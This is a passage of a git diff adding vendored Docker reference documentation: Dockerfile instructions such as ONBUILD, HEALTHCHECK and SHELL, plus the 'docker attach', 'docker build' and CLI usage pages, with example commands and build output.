ubuntu +2 ARG CONT_IMG_VER +3 RUN echo $CONT_IMG_VER +``` + +``` +1 FROM ubuntu +2 ARG CONT_IMG_VER +3 RUN echo hello +``` + +If you specify `--build-arg CONT_IMG_VER=` on the command line, in both +cases, the specification on line 2 does not cause a cache miss; line 3 does +cause a cache miss.`ARG CONT_IMG_VER` causes the RUN line to be identified +as the same as running `CONT_IMG_VER=` echo hello, so if the `` +changes, we get a cache miss. + +Consider another example under the same command line: + +``` +1 FROM ubuntu +2 ARG CONT_IMG_VER +3 ENV CONT_IMG_VER $CONT_IMG_VER +4 RUN echo $CONT_IMG_VER +``` +In this example, the cache miss occurs on line 3. The miss happens because +the variable's value in the `ENV` references the `ARG` variable and that +variable is changed through the command line. In this example, the `ENV` +command causes the image to include the value. + +If an `ENV` instruction overrides an `ARG` instruction of the same name, like +this Dockerfile: + +``` +1 FROM ubuntu +2 ARG CONT_IMG_VER +3 ENV CONT_IMG_VER hello +4 RUN echo $CONT_IMG_VER +``` + +Line 3 does not cause a cache miss because the value of `CONT_IMG_VER` is a +constant (`hello`). As a result, the environment variables and values used on +the `RUN` (line 4) doesn't change between builds. + +## ONBUILD + + ONBUILD [INSTRUCTION] + +The `ONBUILD` instruction adds to the image a *trigger* instruction to +be executed at a later time, when the image is used as the base for +another build. The trigger will be executed in the context of the +downstream build, as if it had been inserted immediately after the +`FROM` instruction in the downstream `Dockerfile`. + +Any build instruction can be registered as a trigger. + +This is useful if you are building an image which will be used as a base +to build other images, for example an application build environment or a +daemon which may be customized with user-specific configuration. + +For example, if your image is a reusable Python application builder, it +will require application source code to be added in a particular +directory, and it might require a build script to be called *after* +that. You can't just call `ADD` and `RUN` now, because you don't yet +have access to the application source code, and it will be different for +each application build. You could simply provide application developers +with a boilerplate `Dockerfile` to copy-paste into their application, but +that is inefficient, error-prone and difficult to update because it +mixes with application-specific code. + +The solution is to use `ONBUILD` to register advance instructions to +run later, during the next build stage. + +Here's how it works: + +1. When it encounters an `ONBUILD` instruction, the builder adds a + trigger to the metadata of the image being built. The instruction + does not otherwise affect the current build. +2. At the end of the build, a list of all triggers is stored in the + image manifest, under the key `OnBuild`. They can be inspected with + the `docker inspect` command. +3. Later the image may be used as a base for a new build, using the + `FROM` instruction. As part of processing the `FROM` instruction, + the downstream builder looks for `ONBUILD` triggers, and executes + them in the same order they were registered. If any of the triggers + fail, the `FROM` instruction is aborted which in turn causes the + build to fail. If all triggers succeed, the `FROM` instruction + completes and the build continues as usual. +4. Triggers are cleared from the final image after being executed. In + other words they are not inherited by "grand-children" builds. + +For example you might add something like this: + + [...] + ONBUILD ADD . /app/src + ONBUILD RUN /usr/local/bin/python-build --dir /app/src + [...] + +> **Warning**: Chaining `ONBUILD` instructions using `ONBUILD ONBUILD` isn't allowed. + +> **Warning**: The `ONBUILD` instruction may not trigger `FROM` or `MAINTAINER` instructions. + +## STOPSIGNAL + + STOPSIGNAL signal + +The `STOPSIGNAL` instruction sets the system call signal that will be sent to the container to exit. +This signal can be a valid unsigned number that matches a position in the kernel's syscall table, for instance 9, +or a signal name in the format SIGNAME, for instance SIGKILL. + +## HEALTHCHECK + +The `HEALTHCHECK` instruction has two forms: + +* `HEALTHCHECK [OPTIONS] CMD command` (check container health by running a command inside the container) +* `HEALTHCHECK NONE` (disable any healthcheck inherited from the base image) + +The `HEALTHCHECK` instruction tells Docker how to test a container to check that +it is still working. This can detect cases such as a web server that is stuck in +an infinite loop and unable to handle new connections, even though the server +process is still running. + +When a container has a healthcheck specified, it has a _health status_ in +addition to its normal status. This status is initially `starting`. Whenever a +health check passes, it becomes `healthy` (whatever state it was previously in). +After a certain number of consecutive failures, it becomes `unhealthy`. + +The options that can appear before `CMD` are: + +* `--interval=DURATION` (default: `30s`) +* `--timeout=DURATION` (default: `30s`) +* `--retries=N` (default: `3`) + +The health check will first run **interval** seconds after the container is +started, and then again **interval** seconds after each previous check completes. + +If a single run of the check takes longer than **timeout** seconds then the check +is considered to have failed. + +It takes **retries** consecutive failures of the health check for the container +to be considered `unhealthy`. + +There can only be one `HEALTHCHECK` instruction in a Dockerfile. If you list +more than one then only the last `HEALTHCHECK` will take effect. + +The command after the `CMD` keyword can be either a shell command (e.g. `HEALTHCHECK +CMD /bin/check-running`) or an _exec_ array (as with other Dockerfile commands; +see e.g. `ENTRYPOINT` for details). + +The command's exit status indicates the health status of the container. +The possible values are: + +- 0: success - the container is healthy and ready for use +- 1: unhealthy - the container is not working correctly +- 2: reserved - do not use this exit code + +For example, to check every five minutes or so that a web-server is able to +serve the site's main page within three seconds: + + HEALTHCHECK --interval=5m --timeout=3s \ + CMD curl -f http://localhost/ || exit 1 + +To help debug failing probes, any output text (UTF-8 encoded) that the command writes +on stdout or stderr will be stored in the health status and can be queried with +`docker inspect`. Such output should be kept short (only the first 4096 bytes +are stored currently). + +When the health status of a container changes, a `health_status` event is +generated with the new status. + +The `HEALTHCHECK` feature was added in Docker 1.12. + + +## SHELL + + SHELL ["executable", "parameters"] + +The `SHELL` instruction allows the default shell used for the *shell* form of +commands to be overridden. The default shell on Linux is `["/bin/sh", "-c"]`, and on +Windows is `["cmd", "/S", "/C"]`. The `SHELL` instruction *must* be written in JSON +form in a Dockerfile. + +The `SHELL` instruction is particularly useful on Windows where there are +two commonly used and quite different native shells: `cmd` and `powershell`, as +well as alternate shells available including `sh`. + +The `SHELL` instruction can appear multiple times. Each `SHELL` instruction overrides +all previous `SHELL` instructions, and affects all subsequent instructions. For example: + + FROM microsoft/windowsservercore + + # Executed as cmd /S /C echo default + RUN echo default + + # Executed as cmd /S /C powershell -command Write-Host default + RUN powershell -command Write-Host default + + # Executed as powershell -command Write-Host hello + SHELL ["powershell", "-command"] + RUN Write-Host hello + + # Executed as cmd /S /C echo hello + SHELL ["cmd", "/S"", "/C"] + RUN echo hello + +The following instructions can be affected by the `SHELL` instruction when the +*shell* form of them is used in a Dockerfile: `RUN`, `CMD` and `ENTRYPOINT`. + +The following example is a common pattern found on Windows which can be +streamlined by using the `SHELL` instruction: + + ... + RUN powershell -command Execute-MyCmdlet -param1 "c:\foo.txt" + ... + +The command invoked by docker will be: + + cmd /S /C powershell -command Execute-MyCmdlet -param1 "c:\foo.txt" + +This is inefficient for two reasons. First, there is an un-necessary cmd.exe command +processor (aka shell) being invoked. Second, each `RUN` instruction in the *shell* +form requires an extra `powershell -command` prefixing the command. + +To make this more efficient, one of two mechanisms can be employed. One is to +use the JSON form of the RUN command such as: + + ... + RUN ["powershell", "-command", "Execute-MyCmdlet", "-param1 \"c:\\foo.txt\""] + ... + +While the JSON form is unambiguous and does not use the un-necessary cmd.exe, +it does require more verbosity through double-quoting and escaping. The alternate +mechanism is to use the `SHELL` instruction and the *shell* form, +making a more natural syntax for Windows users, especially when combined with +the `escape` parser directive: + + # escape=` + + FROM microsoft/nanoserver + SHELL ["powershell","-command"] + RUN New-Item -ItemType Directory C:\Example + ADD Execute-MyCmdlet.ps1 c:\example\ + RUN c:\example\Execute-MyCmdlet -sample 'hello world' + +Resulting in: + + PS E:\docker\build\shell> docker build -t shell . + Sending build context to Docker daemon 4.096 kB + Step 1/5 : FROM microsoft/nanoserver + ---> 22738ff49c6d + Step 2/5 : SHELL powershell -command + ---> Running in 6fcdb6855ae2 + ---> 6331462d4300 + Removing intermediate container 6fcdb6855ae2 + Step 3/5 : RUN New-Item -ItemType Directory C:\Example + ---> Running in d0eef8386e97 + + + Directory: C:\ + + + Mode LastWriteTime Length Name + ---- ------------- ------ ---- + d----- 10/28/2016 11:26 AM Example + + + ---> 3f2fbf1395d9 + Removing intermediate container d0eef8386e97 + Step 4/5 : ADD Execute-MyCmdlet.ps1 c:\example\ + ---> a955b2621c31 + Removing intermediate container b825593d39fc + Step 5/5 : RUN c:\example\Execute-MyCmdlet 'hello world' + ---> Running in be6d8e63fe75 + hello world + ---> 8e559e9bf424 + Removing intermediate container be6d8e63fe75 + Successfully built 8e559e9bf424 + PS E:\docker\build\shell> + +The `SHELL` instruction could also be used to modify the way in which +a shell operates. For example, using `SHELL cmd /S /C /V:ON|OFF` on Windows, delayed +environment variable expansion semantics could be modified. + +The `SHELL` instruction can also be used on Linux should an alternate shell be +required such as `zsh`, `csh`, `tcsh` and others. + +The `SHELL` feature was added in Docker 1.12. + +## Dockerfile examples + +Below you can see some examples of Dockerfile syntax. If you're interested in +something more realistic, take a look at the list of [Dockerization examples](https://docs.docker.com/engine/examples/). + +``` +# Nginx +# +# VERSION 0.0.1 + +FROM ubuntu +LABEL Description="This image is used to start the foobar executable" Vendor="ACME Products" Version="1.0" +RUN apt-get update && apt-get install -y inotify-tools nginx apache2 openssh-server +``` + +``` +# Firefox over VNC +# +# VERSION 0.3 + +FROM ubuntu + +# Install vnc, xvfb in order to create a 'fake' display and firefox +RUN apt-get update && apt-get install -y x11vnc xvfb firefox +RUN mkdir ~/.vnc +# Setup a password +RUN x11vnc -storepasswd 1234 ~/.vnc/passwd +# Autostart firefox (might not be the best way, but it does the trick) +RUN bash -c 'echo "firefox" >> /.bashrc' + +EXPOSE 5900 +CMD ["x11vnc", "-forever", "-usepw", "-create"] +``` + +``` +# Multiple images example +# +# VERSION 0.1 + +FROM ubuntu +RUN echo foo > bar +# Will output something like ===> 907ad6c2736f + +FROM ubuntu +RUN echo moo > oink +# Will output something like ===> 695d7793cbe4 + +# You᾿ll now have two images, 907ad6c2736f with /bar, and 695d7793cbe4 with +# /oink. +``` diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/attach.md b/vendor/github.com/docker/docker/docs/reference/commandline/attach.md new file mode 100644 index 0000000000..307068a339 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/attach.md @@ -0,0 +1,131 @@ +--- +title: "attach" +description: "The attach command description and usage" +keywords: "attach, running, container" +--- + + + +# attach + +```markdown +Usage: docker attach [OPTIONS] CONTAINER + +Attach to a running container + +Options: + --detach-keys string Override the key sequence for detaching a container + --help Print usage + --no-stdin Do not attach STDIN + --sig-proxy Proxy all received signals to the process (default true) +``` + +Use `docker attach` to attach to a running container using the container's ID +or name, either to view its ongoing output or to control it interactively. +You can attach to the same contained process multiple times simultaneously, +screen sharing style, or quickly view the progress of your detached process. + +To stop a container, use `CTRL-c`. This key sequence sends `SIGKILL` to the +container. If `--sig-proxy` is true (the default),`CTRL-c` sends a `SIGINT` to +the container. You can detach from a container and leave it running using the + `CTRL-p CTRL-q` key sequence. + +> **Note:** +> A process running as PID 1 inside a container is treated specially by +> Linux: it ignores any signal with the default action. So, the process +> will not terminate on `SIGINT` or `SIGTERM` unless it is coded to do +> so. + +It is forbidden to redirect the standard input of a `docker attach` command +while attaching to a tty-enabled container (i.e.: launched with `-t`). + +While a client is connected to container's stdio using `docker attach`, Docker +uses a ~1MB memory buffer to maximize the throughput of the application. If +this buffer is filled, the speed of the API connection will start to have an +effect on the process output writing speed. This is similar to other +applications like SSH. Because of this, it is not recommended to run +performance critical applications that generate a lot of output in the +foreground over a slow client connection. Instead, users should use the +`docker logs` command to get access to the logs. + + +## Override the detach sequence + +If you want, you can configure an override the Docker key sequence for detach. +This is useful if the Docker default sequence conflicts with key sequence you +use for other applications. There are two ways to define your own detach key +sequence, as a per-container override or as a configuration property on your +entire configuration. + +To override the sequence for an individual container, use the +`--detach-keys=""` flag with the `docker attach` command. The format of +the `` is either a letter [a-Z], or the `ctrl-` combined with any of +the following: + +* `a-z` (a single lowercase alpha character ) +* `@` (at sign) +* `[` (left bracket) +* `\\` (two backward slashes) +* `_` (underscore) +* `^` (caret) + +These `a`, `ctrl-a`, `X`, or `ctrl-\\` values are all examples of valid key +sequences. To configure a different configuration default key sequence for all +containers, see [**Configuration file** section](cli.md#configuration-files). + +#### Examples + + $ docker run -d --name topdemo ubuntu /usr/bin/top -b + $ docker attach topdemo + top - 02:05:52 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 + Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie + Cpu(s): 0.1%us, 0.2%sy, 0.0%ni, 99.7%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st + Mem: 373572k total, 355560k used, 18012k free, 27872k buffers + Swap: 786428k total, 0k used, 786428k free, 221740k cached + + PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND + 1 root 20 0 17200 1116 912 R 0 0.3 0:00.03 top + + top - 02:05:55 up 3:05, 0 users, load average: 0.01, 0.02, 0.05 + Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie + Cpu(s): 0.0%us, 0.2%sy, 0.0%ni, 99.8%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st + Mem: 373572k total, 355244k used, 18328k free, 27872k buffers + Swap: 786428k total, 0k used, 786428k free, 221776k cached + + PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND + 1 root 20 0 17208 1144 932 R 0 0.3 0:00.03 top + + + top - 02:05:58 up 3:06, 0 users, load average: 0.01, 0.02, 0.05 + Tasks: 1 total, 1 running, 0 sleeping, 0 stopped, 0 zombie + Cpu(s): 0.2%us, 0.3%sy, 0.0%ni, 99.5%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st + Mem: 373572k total, 355780k used, 17792k free, 27880k buffers + Swap: 786428k total, 0k used, 786428k free, 221776k cached + + PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND + 1 root 20 0 17208 1144 932 R 0 0.3 0:00.03 top + ^C$ + $ echo $? + 0 + $ docker ps -a | grep topdemo + 7998ac8581f9 ubuntu:14.04 "/usr/bin/top -b" 38 seconds ago Exited (0) 21 seconds ago topdemo + +And in this second example, you can see the exit code returned by the `bash` +process is returned by the `docker attach` command to its caller too: + + $ docker run --name test -d -it debian + 275c44472aebd77c926d4527885bb09f2f6db21d878c75f0a1c212c03d3bcfab + $ docker attach test + root@f38c87f2a42d:/# exit 13 + exit + $ echo $? + 13 + $ docker ps -a | grep test + 275c44472aeb debian:7 "/bin/bash" 26 seconds ago Exited (13) 17 seconds ago test diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/build.md b/vendor/github.com/docker/docker/docs/reference/commandline/build.md new file mode 100644 index 0000000000..42c3ecf65f --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/build.md @@ -0,0 +1,451 @@ +--- +title: "build" +description: "The build command description and usage" +keywords: "build, docker, image" +--- + + + +# build + +```markdown +Usage: docker build [OPTIONS] PATH | URL | - + +Build an image from a Dockerfile + +Options: + --build-arg value Set build-time variables (default []) + --cache-from value Images to consider as cache sources (default []) + --cgroup-parent string Optional parent cgroup for the container + --compress Compress the build context using gzip + --cpu-period int Limit the CPU CFS (Completely Fair Scheduler) period + --cpu-quota int Limit the CPU CFS (Completely Fair Scheduler) quota + -c, --cpu-shares int CPU shares (relative weight) + --cpuset-cpus string CPUs in which to allow execution (0-3, 0,1) + --cpuset-mems string MEMs in which to allow execution (0-3, 0,1) + --disable-content-trust Skip image verification (default true) + -f, --file string Name of the Dockerfile (Default is 'PATH/Dockerfile') + --force-rm Always remove intermediate containers + --help Print usage + --isolation string Container isolation technology + --label value Set metadata for an image (default []) + -m, --memory string Memory limit + --memory-swap string Swap limit equal to memory plus swap: '-1' to enable unlimited swap + --network string Set the networking mode for the RUN instructions during build + 'bridge': use default Docker bridge + 'none': no networking + 'container:': reuse another container's network stack + 'host': use the Docker host network stack + '|': connect to a user-defined network + --no-cache Do not use cache when building the image + --pull Always attempt to pull a newer version of the image + -q, --quiet Suppress the build output and print image ID on success + --rm Remove intermediate containers after a successful build (default true) + --security-opt value Security Options (default []) + --shm-size string Size of /dev/shm, default value is 64MB. + The format is ``. `number` must be greater than `0`. + Unit is optional and can be `b` (bytes), `k` (kilobytes), `m` (megabytes), + or `g` (gigabytes). If you omit the unit, the system uses bytes. + --squash Squash newly built layers into a single new layer (**Experimental Only**) + -t, --tag value Name and optionally a tag in the 'name:tag' format (default []) + --ulimit value Ulimit options (default []) +``` + +Builds Docker images from a Dockerfile and a "context". A build's context is +the files located in the specified `PATH` or `URL`. The build process can refer +to any of the files in the context. For example, your build can use an +[*ADD*](../builder.md#add) instruction to reference a file in the +context. + +The `URL` parameter can refer to three kinds of resources: Git repositories, +pre-packaged tarball contexts and plain text files. + +### Git repositories + +When the `URL` parameter points to the location of a Git repository, the +repository acts as the build context. The system recursively clones the +repository and its submodules using a `git clone --depth 1 --recursive` +command. This command runs in a temporary directory on your local host. After +the command succeeds, the directory is sent to the Docker daemon as the +context. Local clones give you the ability to access private repositories using +local user credentials, VPN's, and so forth. + +Git URLs accept context configuration in their fragment section, separated by a +colon `:`. The first part represents the reference that Git will check out, +this can be either a branch, a tag, or a commit SHA. The second part represents +a subdirectory inside the repository that will be used as a build context. + +For example, run this command to use a directory called `docker` in the branch +`container`: + +```bash +$ docker build https://github.com/docker/rootfs.git#container:docker +``` + +The following table represents all the valid suffixes with their build +contexts: + +Build Syntax Suffix | Commit Used | Build Context Used +--------------------------------|-----------------------|------------------- +`myrepo.git` | `refs/heads/master` | `/` +`myrepo.git#mytag` | `refs/tags/mytag` | `/` +`myrepo.git#mybranch` | `refs/heads/mybranch` | `/` +`myrepo.git#abcdef` | `sha1 = abcdef` | `/` +`myrepo.git#:myfolder` | `refs/heads/master` | `/myfolder` +`myrepo.git#master:myfolder` | `refs/heads/master` | `/myfolder` +`myrepo.git#mytag:myfolder` | `refs/tags/mytag` | `/myfolder` +`myrepo.git#mybranch:myfolder` | `refs/heads/mybranch` | `/myfolder` +`myrepo.git#abcdef:myfolder` | `sha1 = abcdef` | `/myfolder` + + +### Tarball contexts + +If you pass an URL to a remote tarball, the URL itself is sent to the daemon: + +Instead of specifying a context, you can pass a single Dockerfile in the `URL` +or pipe the file in via `STDIN`. To pipe a Dockerfile from `STDIN`: + +```bash +$ docker build http://server/context.tar.gz +``` + +The download operation will be performed on the host the Docker daemon is +running on, which is not necessarily the same host from which the build command +is being issued. The Docker daemon will fetch `context.tar.gz` and use it as the +build context. Tarball contexts must be tar archives conforming to the standard +`tar` UNIX format and can be compressed with any one of the 'xz', 'bzip2', +'gzip' or 'identity' (no compression) formats. + +### Text files + +Instead of specifying a context, you can pass a single `Dockerfile` in the +`URL` or pipe the file in via `STDIN`. To pipe a `Dockerfile` from `STDIN`: + +```bash +$ docker build - < Dockerfile +``` + +With Powershell on Windows, you can run: + +```powershell +Get-Content Dockerfile | docker build - +``` + +If you use `STDIN` or specify a `URL` pointing to a plain text file, the system +places the contents into a file called `Dockerfile`, and any `-f`, `--file` +option is ignored. In this scenario, there is no context. + +By default the `docker build` command will look for a `Dockerfile` at the root +of the build context. The `-f`, `--file`, option lets you specify the path to +an alternative file to use instead. This is useful in cases where the same set +of files are used for multiple builds. The path must be to a file within the +build context. If a relative path is specified then it is interpreted as +relative to the root of the context. + +In most cases, it's best to put each Dockerfile in an empty directory. Then, +add to that directory only the files needed for building the Dockerfile. To +increase the build's performance, you can exclude files and directories by +adding a `.dockerignore` file to that directory as well. For information on +creating one, see the [.dockerignore file](../builder.md#dockerignore-file). + +If the Docker client loses connection to the daemon, the build is canceled. +This happens if you interrupt the Docker client with `CTRL-c` or if the Docker +client is killed for any reason. If the build initiated a pull which is still +running at the time the build is cancelled, the pull is cancelled as well. + +## Return code + +On a successful build, a return code of success `0` will be returned. When the +build fails, a non-zero failure code will be returned. + +There should be informational output of the reason for failure output to +`STDERR`: + +```bash +$ docker build -t fail . + +Sending build context to Docker daemon 2.048 kB +Sending build context to Docker daemon +Step 1/3 : FROM busybox + ---> 4986bf8c1536 +Step 2/3 : RUN exit 13 + ---> Running in e26670ec7a0a +INFO[0000] The command [/bin/sh -c exit 13] returned a non-zero code: 13 +$ echo $? +1 +``` + +See also: + +[*Dockerfile Reference*](../builder.md). + +## Examples + +### Build with PATH + +```bash +$ docker build . + +Uploading context 10240 bytes +Step 1/3 : FROM busybox +Pulling repository busybox + ---> e9aa60c60128MB/2.284 MB (100%) endpoint: https://cdn-registry-1.docker.io/v1/ +Step 2/3 : RUN ls -lh / + ---> Running in 9c9e81692ae9 +total 24 +drwxr-xr-x 2 root root 4.0K Mar 12 2013 bin +drwxr-xr-x 5 root root 4.0K Oct 19 00:19 dev +drwxr-xr-x 2 root root 4.0K Oct 19 00:19 etc +drwxr-xr-x 2 root root 4.0K Nov 15 23:34 lib +lrwxrwxrwx 1 root root 3 Mar 12 2013 lib64 -> lib +dr-xr-xr-x 116 root root 0 Nov 15 23:34 proc +lrwxrwxrwx 1 root root 3 Mar 12 2013 sbin -> bin +dr-xr-xr-x 13 root root 0 Nov 15 23:34 sys +drwxr-xr-x 2 root root 4.0K Mar 12 2013 tmp +drwxr-xr-x 2 root root 4.0K Nov 15 23:34 usr + ---> b35f4035db3f +Step 3/3 : CMD echo Hello world + ---> Running in 02071fceb21b + ---> f52f38b7823e +Successfully built f52f38b7823e +Removing intermediate container 9c9e81692ae9 +Removing intermediate container 02071fceb21b +``` + +This example specifies that the `PATH` is `.`, and so all the files in the +local directory get `tar`d and sent to the Docker daemon. The `PATH` specifies +where to find the files for the "context" of the build on the Docker daemon. +Remember that the daemon could be running on a remote machine and that no +parsing of the Dockerfile happens at the client side (where you're running +`docker build`). That means that *all* the files at `PATH` get sent, not just +the ones listed to [*ADD*](../builder.md#add) in the Dockerfile. + +The transfer of context from the local machine to the Docker daemon is what the +`docker` client means when you see the "Sending build context" message. + +If you wish to keep the intermediate containers after the build is complete, +you must use `--rm=false`. This does not affect the build cache. + +### Build with URL + +```bash +$ docker build github.com/creack/docker-firefox +``` + +This will clone the GitHub repository and use the cloned repository as context. +The Dockerfile at the root of the repository is used as Dockerfile. You can +specify an arbitrary Git repository by using the `git://` or `git@` scheme. + +```bash +$ docker build -f ctx/Dockerfile http://server/ctx.tar.gz + +Downloading context: http://server/ctx.tar.gz [===================>] 240 B/240 B +Step 1/3 : FROM busybox + ---> 8c2e06607696 +Step 2/3 : ADD ctx/container.cfg / + ---> e7829950cee3 +Removing intermediate container b35224abf821 +Step 3/3 : CMD /bin/ls + ---> Running in fbc63d321d73 + ---> 3286931702ad +Removing intermediate container fbc63d321d73 +Successfully built 377c409b35e4 +``` + +This sends the URL `http://server/ctx.tar.gz` to the Docker daemon, which +downloads and extracts the referenced tarball. The `-f ctx/Dockerfile` +parameter specifies a path inside `ctx.tar.gz` to the `Dockerfile` that is used +to build the image. Any `ADD` commands in that `Dockerfile` that refer to local +paths must be relative to the root of the contents inside `ctx.tar.gz`. In the +example above, the tarball contains a directory `ctx/`, so the `ADD +ctx/container.cfg /` operation works as expected. + +### Build with - + +```bash +$ docker build - < Dockerfile +``` + +This will read a Dockerfile from `STDIN` without context. Due to the lack of a +context, no contents of any local directory will be sent to the Docker daemon. +Since there is no context, a Dockerfile `ADD` only works if it refers to a +remote URL. + +```bash +$ docker build - < context.tar.gz +``` + +This will build an image for a compressed context read from `STDIN`. Supported +formats are: bzip2, gzip and xz. + +### Usage of .dockerignore + +```bash +$ docker build . + +Uploading context 18.829 MB +Uploading context +Step 1/2 : FROM busybox + ---> 769b9341d937 +Step 2/2 : CMD echo Hello world + ---> Using cache + ---> 99cc1ad10469 +Successfully built 99cc1ad10469 +$ echo ".git" > .dockerignore +$ docker build . +Uploading context 6.76 MB +Uploading context +Step 1/2 : FROM busybox + ---> 769b9341d937 +Step 2/2 : CMD echo Hello world + ---> Using cache + ---> 99cc1ad10469 +Successfully built 99cc1ad10469 +``` + +This example shows the use of the `.dockerignore` file to exclude the `.git` +directory from the context. Its effect can be seen in the changed size of the +uploaded context. The builder reference contains detailed information on +[creating a .dockerignore file](../builder.md#dockerignore-file) + +### Tag image (-t) + +```bash +$ docker build -t vieux/apache:2.0 . +``` + +This will build like the previous example, but it will then tag the resulting +image. The repository name will be `vieux/apache` and the tag will be `2.0`. +[Read more about valid tags](tag.md). + +You can apply multiple tags to an image. For example, you can apply the `latest` +tag to a newly built image and add another tag that references a specific +version. +For example, to tag an image both as `whenry/fedora-jboss:latest` and +`whenry/fedora-jboss:v2.1`, use the following: + +```bash +$ docker build -t whenry/fedora-jboss:latest -t whenry/fedora-jboss:v2.1 . +``` +### Specify Dockerfile (-f) + +```bash +$ docker build -f Dockerfile.debug . +``` + +This will use a file called `Dockerfile.debug` for the build instructions +instead of `Dockerfile`. + +```bash +$ docker build -f dockerfiles/Dockerfile.debug -t myapp_debug . +$ docker build -f dockerfiles/Dockerfile.prod -t myapp_prod . +``` + +The above commands will build the current build context (as specified by the +`.`) twice, once using a debug version of a `Dockerfile` and once using a +production version. + +```bash +$ cd /home/me/myapp/some/dir/really/deep +$ docker build -f /home/me/myapp/dockerfiles/debug /home/me/myapp +$ docker build -f ../../../../dockerfiles/debug /home/me/myapp +``` + +These two `docker build` commands do the exact same thing. They both use the +contents of the `debug` file instead of looking for a `Dockerfile` and will use +`/home/me/myapp` as the root of the build context. Note that `debug` is in the +directory structure of the build context, regardless of how you refer to it on +the command line. + +> **Note:** +> `docker build` will return a `no such file or directory` error if the +> file or directory does not exist in the uploaded context. This may +> happen if there is no context, or if you specify a file that is +> elsewhere on the Host system. The context is limited to the current +> directory (and its children) for security reasons, and to ensure +> repeatable builds on remote Docker hosts. This is also the reason why +> `ADD ../file` will not work. + +### Optional parent cgroup (--cgroup-parent) + +When `docker build` is run with the `--cgroup-parent` option the containers +used in the build will be run with the [corresponding `docker run` +flag](../run.md#specifying-custom-cgroups). + +### Set ulimits in container (--ulimit) + +Using the `--ulimit` option with `docker build` will cause each build step's +container to be started using those [`--ulimit` +flag values](./run.md#set-ulimits-in-container-ulimit). + +### Set build-time variables (--build-arg) + +You can use `ENV` instructions in a Dockerfile to define variable +values. These values persist in the built image. However, often +persistence is not what you want. Users want to specify variables differently +depending on which host they build an image on. + +A good example is `http_proxy` or source versions for pulling intermediate +files. The `ARG` instruction lets Dockerfile authors define values that users +can set at build-time using the `--build-arg` flag: + +```bash +$ docker build --build-arg HTTP_PROXY=http://10.20.30.2:1234 . +``` + +This flag allows you to pass the build-time variables that are +accessed like regular environment variables in the `RUN` instruction of the +Dockerfile. Also, these values don't persist in the intermediate or final images +like `ENV` values do. + +Using this flag will not alter the output you see when the `ARG` lines from the +Dockerfile are echoed during the build process. + +For detailed information on using `ARG` and `ENV` instructions, see the +[Dockerfile reference](../builder.md). + +### Optional security options (--security-opt) + +This flag is only supported on a daemon running on Windows, and only supports +the `credentialspec` option. The `credentialspec` must be in the format +`file://spec.txt` or `registry://keyname`. + +### Specify isolation technology for container (--isolation) + +This option is useful in situations where you are running Docker containers on +Windows. The `--isolation=` option sets a container's isolation +technology. On Linux, the only supported is the `default` option which uses +Linux namespaces. On Microsoft Windows, you can specify these values: + + +| Value | Description | +|-----------|---------------------------------------------------------------------------------------------------------------------------------------------------------------| +| `default` | Use the value specified by the Docker daemon's `--exec-opt` . If the `daemon` does not specify an isolation technology, Microsoft Windows uses `process` as its default value. | +| `process` | Namespace isolation only. | +| `hyperv` | Hyper-V hypervisor partition-based isolation. | + +Specifying the `--isolation` flag without a value is the same as setting `--isolation="default"`. + + +### Squash an image's layers (--squash) **Experimental Only** + +Once the image is built, squash the new layers into a new image with a single +new layer. Squashing does not destroy any existing image, rather it creates a new +image with the content of the squshed layers. This effectively makes it look +like all `Dockerfile` commands were created with a single layer. The build +cache is preserved with this method. + +**Note**: using this option means the new image will not be able to take +advantage of layer sharing with other images and may use significantly more +space. + +**Note**: using this option you may see significantly more space used due to +storing two copies of the image, one for the build cache with all the cache +layers in tact, and one for the squashed version. diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/cli.md b/vendor/github.com/docker/docker/docs/reference/commandline/cli.md new file mode 100644 index 0000000000..e56fb9f847 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/reference/commandline/cli.md @@ -0,0 +1,249 @@ +--- +title: "Use the Docker command line" +description: "Docker's CLI command description and usage" +keywords: "Docker, Docker documentation, CLI, command line" +--- + + + +# Use the Docker command line + +To list available commands, either run `docker` with no parameters +or execute `docker help`: + +```bash +$ docker +Usage: docker [OPTIONS] COMMAND [ARG...] + docker [ --help | -v | --version ] + +A self-sufficient runtime for containers. + +Options: + --config string Location of client config files (default "/root/.docker") + -D, --debug Enable debug mode + --help Print usage + -H, --host value Daemon socket(s) to connect to (default []) + -l, --log-level string Set the logging level ("debug", "info", "warn", "error", "fatal") (default "info") + --tls Use TLS; implied by --tlsverify + --tlscacert string Trust certs signed only by this CA (default "/root/.docker/ca.pem") + --tlscert string Path to TLS certificate file (default "/root/.docker/cert.pem") + --tlskey string Path to TLS key file (default "/root/.docker/key.pem") + --tlsverify Use TLS and verify the remote + -v, --version Print version information and quit + +Commands: + attach Attach to a running container + # […] +``` + +Depending on your Docker system configuration, you may be required to preface +each `docker` command with `sudo`. To avoid having to use `sudo` with the +`docker` command, your system administrator can create a Unix group called +`docker` and add users to it. + +For more information about installing Docker or `sudo` configuration, refer to +the [installation](https://docs.docker.com/engine/installation/) instructions for your operating system. + +## Environment variables + +For easy reference, the following list of environment variables are supported +by the `docker` command line: + +* `DOCKER_API_VERSION` The API version to use (e.g. `1.19`) +* `DOCKER_CONFIG` The location of your client configuration files. +* `DOCKER_CERT_PATH` The location of your authentication keys. +* `DOCKER_DRIVER` The graph driver to use. +* `DOCKER_HOST` Daemon socket to connect to. +* `DOCKER_NOWARN_KERNEL_VERSION` Prevent warnings that your Linux kernel is + unsuitable for Docker. +* `DOCKER_RAMDISK` If set this will disable 'pivot_root'. +* `DOCKER_TLS_VERIFY` When set Docker uses TLS and verifies the remote. +* `DOCKER_CONTENT_TRUST` When set Docker uses notary to sign and verify images. + Equates to `--disable-content-trust=false` for build, create, pull, push, run. +* `DOCKER_CONTENT_TRUST_SERVER` The URL of the Notary server to use. This defaults + to 